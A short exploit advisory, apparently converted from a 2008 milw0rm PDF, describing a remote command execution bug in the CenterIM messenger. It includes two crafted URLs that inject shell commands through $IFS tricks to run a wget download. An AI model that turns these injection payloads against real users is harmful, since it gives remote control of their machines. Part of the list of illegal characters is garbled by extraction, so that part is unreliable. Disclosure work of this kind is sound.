CenterIM 4.22.3 Remote Command Execution Vulnerability.pdf

1 ####################################################################### 2 3 Application: CenterIM 4 http://www.centerim.org/index.php/Main_Page 5 Versions: centerim <= 4.22.3 6 OS: Linux 7 Bug: Execution of shell commands 8 Exploit: remote 9 Date: 15 March 2008 10 Author: Brian Fonfara (w00) 11 eMail: brian.fonfara@gmx.de 12 Web: newb.kicks−ass.net 13 14 15 ####################################################################### 16 17 1) Bug 18 2) Exploit 19 20 21 ####################################################################### 22 23 ======= 24 1) Bug 25 ======= 26 27 Received URLs in the message window do not get checked for illegal 28 characters, like "\’", "\"", ";", "__DOCTEXT__quot;, "{", "}", "&&" and "||" 29 30 ####################################################################### 31 32 =========== 33 2) Exploit 34 =========== 35 36 Standard settings: 37 − Browser already open: 38 http://gidf.de/centerim)’;cd$IFS$HOME/Desktop;wget${IFS}http://google.de;’( 39 40 − New browser instance: 41 http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de" 42 43 ####################################################################### 44 45 Greets to: mrks 46 47 # milw0rm.com [2008−03−20] Page 1/1 CenterIM 4.22.3 Remote Command Execution Vulnerability Brian Fonfara 03/20/2008